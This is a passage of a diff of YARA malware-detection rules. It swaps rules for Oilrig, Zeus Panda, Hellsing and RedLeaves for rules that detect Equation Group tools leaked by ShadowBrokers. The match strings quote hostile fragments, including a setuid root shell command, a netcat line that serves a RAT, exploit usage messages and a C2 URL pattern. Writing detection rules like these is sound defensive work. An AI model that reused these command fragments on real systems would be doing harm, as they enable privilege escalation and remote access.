+		$x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" fullword ascii
+		$x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
+		$x3 = "CALLBACK_PORT=32177" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( all of ( $s* ) or $x1 )
+		( uint16( 0 ) == 0x2123 and filesize < 3KB and 1 of them )
 }
-rule SIGNATURE_BASE_Oilrig_PS_Cnc : FILE
+rule SIGNATURE_BASE_Equationgroup_Eh_1_1_0 : FILE
 {
 	meta:
-		description = "Powershell CnC using DNS queries"
-		author = "Markus Neis"
-		id = "cbc5689c-37ff-59b6-9e3a-7d8577021f70"
-		date = "2018-03-22"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a6f0ec1f-b0e5-5913-970d-9cdadf647c44"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L94-L107"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L153-L168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0566f0707021af0d08426eec497292098273d46b020a5f0be6b98835ceeb82bc"
+		logic_hash = "d0972bb57076606b3c84f3cbbb0be85cd5663c7cd6f6d9f09a2991cb6532bfa9"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9198c29a26f9c55317b4a7a722bf084036e93a41ba4466cbb61ea23d21289cfa"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628"
 
 	strings:
-		$x1 = "(-join $base32filedata[$uploadedCompleteSize..$($uploadedCompleteSize" fullword ascii
-		$s2 = "$hostname = \"D\" + $fileID + (-join ((65..90) + (48..57) + (97..122)|" ascii
+		$x1 = "usage: %s -e -v -i target IP [-c Cert File] [-k Key File]" fullword ascii
+		$x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii
+		$x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" fullword ascii
 
 	condition:
-		filesize < 40KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_Zeus_Panda : FILE
+rule SIGNATURE_BASE_Equationgroup_Evolvingstrategy_1_0_1 : FILE
 {
 	meta:
-		description = "Detects ZEUS Panda Malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2786b1e0-37af-5595-a24b-56ef3cb928a7"
-		date = "2017-08-04"
+		id = "465f709b-1791-5b36-836b-7a0c08bb9b88"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_zeus_panda.yar#L11-L33"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L170-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "63312763196259204dcee6b6c46ae1a16abeab0afabbce9e2e8413131856b04e"
+		logic_hash = "87d25f1a4ca4a75292ab6cdcd1a79890c4475c2a9b34761ed92988bd517b4497"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bd956b2e81731874995b9b92e20f75dbf67ac5f12f9daa194525e1b673c7f83c"
+		hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b"
 
 	strings:
-		$x1 = "SER32.dll" fullword ascii
-		$x2 = "/c start \"\" \"%s\"" fullword wide
-		$x3 = "del /F \"%s\"" fullword ascii
-		$s1 = "bcdfghklmnpqrstvwxz" fullword ascii
-		$s2 = "=> -,0;" fullword ascii
-		$s3 = "Yahoo! Slurp" fullword ascii
-		$s4 = "ZTNHGET ^&" fullword ascii
-		$s5 = "MSIE 9" fullword ascii
-		$s6 = "%s%08x.%s" fullword wide
+		$s1 = "chown root sh; chmod 4777 sh;" fullword ascii
+		$s2 = "cp /bin/sh .;chown root sh;" fullword ascii
+		$l1 = "echo clean up when elevated:" fullword ascii
+		$x1 = "EXE=$DIR/sbin/ey_vrupdate" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 2 of ( $x* ) or 4 of them )
+		( filesize < 4KB and 1 of them )
 }
-rule SIGNATURE_BASE_SUSP_Macro_Staroffice : FILE
+rule SIGNATURE_BASE_Equationgroup_Toast_V3_2_0 : FILE
 {
 	meta:
-		description = "Suspicious macro in StarOffice"
-		author = "John Lambert @JohnLaTwC"
-		id = "92110a87-66b4-5fc5-b3f5-3e59ec2671b2"
-		date = "2019-02-06"
-		modified = "2021-05-27"
-		reference = "https://twitter.com/JohnLaTwC/status/1093259873993732096"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_macro_staroffice_suspicious.yar#L1-L38"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux"
+		author = "Florian Roth (Nextron Systems)"
+		id = "776014ae-be94-5d81-bceb-fefb67ee1994"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L190-L205"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "49385335488fa0a598ed48203d9483c5c2f53ae287e003a8cf7d64d56280e62a"
-		score = 60
-		quality = 81
+		logic_hash = "a505eaafb6882e2701fe0a9b8712f85c1073d83291436eeaa7f4c52876d12359"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		hash1 = "8495d37825dab8744f7d2c8049fc6b70b1777b9184f0abe69ce314795480ce39"
-		hash2 = "25b4214da1189fd30d3de7c538aa8b606f22c79e50444e5733fb1c6d23d71fbe"
-		hash3 = "322f314102f67a16587ab48a0f75dfaf27e4b044ffdc3b88578351c05b4f39db"
-		hash4 = "705429725437f7e0087a6159708df97992abaadff0fa48fdf25111d34a3e2f20"
-		hash5 = "7141d94e827d3b24810813d6b2e3fb851da0ee2958ef347154bc28153b23874a"
-		hash6 = "7c0e85c0a4d96080ca341d3496743f0f113b17613660812d40413be6d453eab4"
-		hash7 = "8d59f1e2abcab9efb7f833d478d1d1390e7456092f858b656ee0024daf3d1aa3"
-		hash8 = "9846b942d9d1e276c95361180e9326593ea46d3abcce9c116c204954bbfe3fdc"
-		hash9 = "aa0c83f339c8c16ad21dec41e4605d4e327adbbb78827dcad250ed64d2ceef1c"
-		hash10 = "b0be54c7210b06e60112a119c235e23c9edbe40b1c1ce1877534234f82b6b302"
-		hash11 = "bf581ebb96b8ca4f254ab4d200f9a053aff8187715573d9a1cbd443df0f554e3"
-		hash12 = "de45634064af31cb6768e4912cac284a76a6e66d398993df1aeee8ce26e0733b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2ce2d16d24069dc29cf1464819a9dc6deed38d1e5ffc86d175b06ddb691b648b"
 
 	strings:
-		$r1 = "StarBasic"
-		$r2 = "</script:module>"
-		$s1 = "Shell" nocase
-		$s2 = ".Run" nocase
-		$s3 = ".PutInClipboard" nocase
-		$s4 = "powershell" nocase
-		$fp1 = "LibreOffice project" ascii
+		$x2 = "Del --- Usage: %s -l file -w wtmp -r user" fullword ascii
+		$s5 = "Roasting ->%s<- at ->%d:%d<-" ascii
+		$s6 = "rbnoil -Roasting ->" fullword ascii
 
 	condition:
-		filesize < 1MB and uint32be( 0 ) == 0x3c3f786d and all of ( $r* ) and 1 of ( $s* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_MAL_Hogfish_Report_Related_Sample : FILE
+rule SIGNATURE_BASE_Equationgroup_Sshobo : FILE
 {
 	meta:
-		description = "Detects APT10 / Hogfish related samples"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7fc4fdda-b71f-5c9c-87a4-5d8290b99348"
-		date = "2018-05-01"
+		id = "b9392aec-34a8-5ad2-b3fd-eea907d19701"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt10_redleaves.yar#L13-L31"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L207-L223"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bff74f7a72a3e40e828284ed37b2f7ea64d8df52e946372d38e379d9b7b7a445"
+		logic_hash = "90c892e06ccedb6a3208d728e9f3c27c14bbe1b4c13b63d4a350bbbf38efbe9d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f9acc706d7bec10f88f9cfbbdf80df0d85331bd4c3c0188e4d002d6929fe4eac"
-		hash2 = "7188f76ca5fbc6e57d23ba97655b293d5356933e2ab5261e423b3f205fe305ee"
-		hash3 = "4de5a22cd798950a69318fdcc1ec59e9a456b4e572c2d3ac4788ee96a4070262"
+		hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45"
 
 	strings:
-		$s1 = "R=user32.dll" fullword ascii
+		$x1 = "Requested forwarding of port %d but user is not root." fullword ascii
+		$x2 = "internal error: we do not read, but chan_read_failed for istate" fullword ascii
+		$x3 = "~#  - list forwarded connections" fullword ascii
+		$x4 = "packet_inject_ignore: block" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "efad9ff8c0d2a6419bf1dd970bcd806d" or 1 of them )
+		( uint16( 0 ) == 0x457f and filesize < 600KB and all of them )
 }
-
-rule SIGNATURE_BASE_MAL_Redleaves_Apr18_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Magicjack_V1_1_0_0_Client_1_1_0_0 : FILE
 {
 	meta:
-		description = "Detects RedLeaves malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "578b40d7-6818-56d5-92ce-535141c0aa8e"
-		date = "2018-05-01"
+		id = "008cb5cf-1d2d-5312-9474-2f93db190974"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt10_redleaves.yar#L33-L48"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L225-L239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e34b95e96de88aef20050b6b9580600365284117918c24f76c884b089fa20623"
+		logic_hash = "44e853b8d148f84107d29449aa44b2e52226c9d2f397c019aa0f1d347863e388"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "f6449e255bc1a9d4a02391be35d0dd37def19b7e20cfcc274427a0b39cb21b7b"
-		hash2 = "db7c1534dede15be08e651784d3a5d2ae41963d192b0f8776701b4b72240c38d"
-		hash3 = "d956e2ff1b22ccee2c5d9819128103d4c31ecefde3ce463a6dea19ecaaf418a1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
+
+	strings:
+		$x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" fullword ascii
+		$x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "7a861cd9c495e1d950a43cb708a22985" or pe.imphash ( ) == "566a7a4ef613a797389b570f8b4f79df" )
+		( uint16( 0 ) == 0x2123 and filesize < 80KB and 1 of them )
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Implantstrings : FILE
+rule SIGNATURE_BASE_Equationgroup_Packrat : FILE
 {
 	meta:
-		description = "detection for Hellsing implants"
-		author = "Kaspersky Lab"
-		id = "00aa5885-ae79-5d68-8587-13d3e8965630"
-		date = "2015-04-07"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file packrat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4c0619c4-728f-591f-aa02-7c28f1f42fd1"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L2-L29"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L241-L256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d62dc766a40d1dc7044cc5c9f07a78d36e231b771fafb52442b26514f4c603db"
+		logic_hash = "7e88e14e0d9c8e8f5ccca3bea78b875bf75fbf0dd54badc339237ca94f0d6373"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf"
 
 	strings:
-		$a1 = "the file uploaded failed !"
-		$a2 = "ping 127.0.0.1"
-		$b1 = "the file downloaded failed !"
-		$b2 = "common.asp"
-		$c = "xweber_server.exe"
-		$d = "action="
-		$debugpath1 = "d:\\Hellsing\\release\\msger\\" nocase
-		$debugpath2 = "d:\\hellsing\\sys\\xrat\\" nocase
-		$debugpath3 = "D:\\Hellsing\\release\\exe\\" nocase
-		$debugpath4 = "d:\\hellsing\\sys\\xkat\\" nocase
-		$debugpath5 = "e:\\Hellsing\\release\\clare" nocase
-		$debugpath6 = "e:\\Hellsing\\release\\irene\\" nocase
-		$debugpath7 = "d:\\hellsing\\sys\\irene\\" nocase
-		$e = "msger_server.dll"
-		$f = "ServiceMain"
+		$x2 = "Use this on target to get your RAT:" fullword ascii
+		$x3 = "$ratremotename && " fullword ascii
+		$x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $a* ) ) or ( all of ( $b* ) ) or ( $c and $d ) or ( any of ( $debugpath* ) ) or ( $e and $f ) and filesize < 500000
+		( filesize < 70KB and 1 of them )
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Installer : FILE
+rule SIGNATURE_BASE_Equationgroup_Telex : FILE
 {
 	meta:
-		description = "detection for Hellsing xweber/msger installers"
-		author = "Kaspersky Lab"
-		id = "0aca838e-813a-59ee-8a04-7d2f4e854075"
-		date = "2015-04-07"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file telex"
+		author = "Florian Roth (Nextron Systems)"
+		id = "23571734-869d-5d68-9339-d82f168c2e47"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L31-L54"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L258-L274"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "556898e9507835d93e2cf7e21e997b6e64dc154ac675b429f5f8226bf929309c"
+		logic_hash = "9661bc43831307cb04883cfe8e54ebb2fe72bf3d7731b2b483cd19c40a5aeaa9"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef"
 
 	strings:
-		$cmd = "cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\""
-		$a1 = "xweber_install_uac.exe"
-		$a2 = "system32\\cmd.exe" wide
-		$a4 = "S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y="
-		$a5 = "S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg="
-		$a6 = "7dqm2ODf5N/Y2N/m6+br3dnZpunl44g="
-		$a7 = "vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw=="
-		$a8 = "vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSINjl2tyI"
-		$a9 = "C:\\Windows\\System32\\sysprep\\sysprep.exe" wide
-		$a10 = "%SystemRoot%\\system32\\cmd.exe" wide
-		$a11 = "msger_install.dll"
-		$a12 = {00 65 78 2E 64 6C 6C 00}
+		$x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>" fullword ascii
+		$x2 = "target is not vulnerable. exiting" fullword ascii
+		$s3 = "Sending final buffer: evil_blocks and shellcode..." fullword ascii
+		$s4 = "Timeout waiting for daemon to die.  Exploit probably failed." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $cmd and ( 2 of ( $a* ) ) ) and filesize < 500000
+		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of them )
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Proxytool : FILE
+rule SIGNATURE_BASE_Equationgroup_Calserver : FILE
 {
 	meta:
-		description = "detection for Hellsing proxy testing tool"
-		author = "Kaspersky Lab"
-		id = "54454f07-11a9-5456-b489-9a9610e53123"
-		date = "2015-04-07"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file calserver"
+		author = "Florian Roth (Nextron Systems)"
+		id = "abe935ee-8579-54f0-b6d3-172d6e2c0482"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L56-L74"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L276-L291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8f2656e7b4e6fb5336fb4e39bcec3e99531db532f757b65e3aa12cd2a4334840"
-		score = 50
+		logic_hash = "85080074058703a696ac7f978abd8f4d5234f6553c19736fb52375421c4af42b"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099"
 
 	strings:
-		$a1 = "PROXY_INFO: automatic proxy url => %s"
-		$a2 = "PROXY_INFO: connection type => %d"
-		$a3 = "PROXY_INFO: proxy server => %s"
-		$a4 = "PROXY_INFO: bypass list => %s"
-		$a5 = "InternetQueryOption failed with GetLastError() %d"
-		$a6 = "D:\\Hellsing\\release\\exe\\exe\\" nocase
+		$x1 = "usage: %s <host> <port> e <contents of a local file to be executed on target>" fullword ascii
+		$x2 = "Writing your %s to target." fullword ascii
+		$x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $a* ) ) and filesize < 300000
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of them )
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Xkat : FILE
+rule SIGNATURE_BASE_Equationgroup_Porkclient : FILE
 {
 	meta:
-		description = "detection for Hellsing xKat tool"
-		author = "Kaspersky Lab"
-		id = "c831ce04-8fb2-5790-8aaf-c88b370835ac"
-		date = "2015-04-07"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5b34d5f9-bc76-5cc7-92f7-32c2b7ef7bcf"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L76-L97"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L293-L308"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ba74ca11c96e59a04f1cb57b4866df7a581ad94ca81230f2ca5068c8808297aa"
+		logic_hash = "4de13f1cac8698fc86e44d29143877924aec4e6712415ee6b35810afed8072d6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748"
 
 	strings:
-		$a1 = "\\Dbgv.sys"
-		$a2 = "XKAT_BIN"
-		$a3 = "release sys file error."
-		$a4 = "driver_load error. "
-		$a5 = "driver_create error."
-		$a6 = "delete file:%s error."
-		$a7 = "delete file:%s ok."
-		$a8 = "kill pid:%d error."
-		$a9 = "kill pid:%d ok."
-		$a10 = "-pid-delete"
-		$a11 = "kill and delete pid:%d error."
-		$a12 = "kill and delete pid:%d ok."
+		$s1 = "-c COMMAND: shell command string" fullword ascii
+		$s2 = "Cannot combine shell command mode with args to do socket reuse" fullword ascii
+		$s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $a* ) ) and filesize < 300000
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of them )
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Msgertype2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Electricslide : FILE
 {
 	meta:
-		description = "detection for Hellsing msger type 2 implants"
-		author = "Kaspersky Lab"
-		id = "98f151de-c1c2-56c1-8c64-5d1f437e0742"
-		date = "2015-04-07"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5b1e5293-806a-58e6-b865-66025c8d8c32"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L99-L117"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L310-L326"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "232e4dfd8d236da223240d9a4ec3f8bfa635d51d7376ff19dfa5579af31fc47f"
+		logic_hash = "0803b61afc592d4fba523dc54d8f856a557b916a9f6e256efccd50178e8e024c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014"
 
 	strings:
-		$a1 = "%s\\system\\%d.txt"
-		$a2 = "_msger"
-		$a3 = "http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s"
-		$a4 = "http://%s/data/%s.1000001000"
-		$a5 = "/lib/common.asp?action=user_upload&file="
-		$a6 = "%02X-%02X-%02X-%02X-%02X-%02X"
+		$x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" fullword ascii
+		$x2 = "Recieved Unknown Command Payload: 0x%x" fullword ascii
+		$x3 = "Usage: eslide   [options] <-t profile> <-l listenerip> <targetip>" fullword ascii
+		$x4 = "-------- Delete Key - Remove a *closed* tab" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $a* ) ) and filesize < 500000
+		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Irene : FILE
+rule SIGNATURE_BASE_Equationgroup_Libxmexploit2 : FILE
 {
 	meta:
-		description = "detection for Hellsing msger irene installer"
-		author = "Kaspersky Lab"
-		id = "b57d1a10-4e5c-511f-b98c-8ce7d766c227"
-		date = "2015-04-07"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8"
+		author = "Florian Roth (Nextron Systems)"
+		id = "30e94123-acc9-5185-9f5b-1f956c4cf3d1"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L119-L137"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L328-L343"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e7da04083468dba7045b55181642d7cd57d543fbeda24685ba2ac63799740798"
+		logic_hash = "7bd88d15cca38e91c65e8373194e35ab9492a80eb27b22ad4000e192f2d9b886"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796"
 
 	strings:
-		$a1 = "\\Drivers\\usbmgr.tmp" wide
-		$a2 = "\\Drivers\\usbmgr.sys" wide
-		$a3 = "common_loadDriver CreateFile error!"
-		$a4 = "common_loadDriver StartService error && GetLastError():%d!"
-		$a5 = "irene" wide
-		$a6 = "aPLib v0.43 - the smaller the better"
+		$s1 = "Usage: ./exp command display_to_return_to" fullword ascii
+		$s2 = "sizeof shellcode = %d" fullword ascii
+		$s3 = "Execve failed!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $a* ) ) and filesize < 500000
+		( uint16( 0 ) == 0x457f and filesize < 40KB and 1 of them )
 }
-rule SIGNATURE_BASE_Ransom_Lockergoga_Mar19_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Wrap_Telnet : FILE
 {
 	meta:
-		description = "Detects LockerGoga ransomware binaries"
